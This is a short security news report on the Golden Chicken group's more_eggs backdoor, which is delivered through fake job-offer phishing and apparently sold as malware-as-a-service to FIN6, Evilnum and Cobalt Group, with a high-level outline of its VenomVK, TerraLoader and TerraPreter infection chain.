A group of cybercriminals, known as Golden Chicken, is believed to sell their more_eggs backdoor to attackers who target LinkedIn users. The gang is selling access to systems infected with the malware to high-profile cybercrime organizations, including FIN6, Cobalt Group, and Evilnum, all known for their sophisticated attacks targeted at various corporate and government organizations.
more_eggs backdoor could allow attackers to execute various operations on the target device, including enabling remote control of the infected machines.
The hackers use phishing emails with job offers to professional employees in the healthcare industry. Researchers at cybersecurity company eSentire point out that the used method is identical to tactics Golden Chicken used in the past.
The phishing emails contain a ZIP file that is named after the job position it offers. If opened, the attachment executes a stealthy component called VenomVK.
VenomVK will then use Windows Management Instrumentation (WMI) to obtain a second-stage malware loader named TerraLoader.
TerraLoader will hijack two legitimate windows processes (cmstp and regsvr32) to load the final payload, TerraPreter.
TerraPreter evades network detection by being hosted on Amazon AWS servers and getting deployed by ActiveX control, which allows execution via Internet Explorer.
In the meantime, TerraLoader will camouflage the malicious operation by evading user detection. The loader will drop and open a Microsoft Word file that contains an employment application, as outlined in the phishing email.
Once installed, TerraPreter will establish a connection to the attacker’s command and control (C&C) server and will register the infection.
According to eSentire researchers, Golden Chickens offer their more_eggs botnets as a Malware-as-a-Service (MaaS), catering to a select group of high-profile clients.
FIN6, notorious for attacking point-of-sale systems and stealing card data, has been using more_eggs to hit retail, hospitality, and food service companies in 2019. In another campaign from 2019, FIN6 used fake job offer bait to target numerous employees.
Evilnum, a suspected mercenary group known for attacking financial tech companies and trading platforms, also deployed a fake job offer campaign.
Cobalt Group, also known as Carbank, known for their stealth and patience, sometimes spending months on victims' networks, is also detected to use more_eggs backdoor.
Judging by the sophistication of Golden Chicken’s backdoor and their clients, the attack should be considered a high threat, especially as attackers could have already spread the malware to critical systems and are preparing their next move.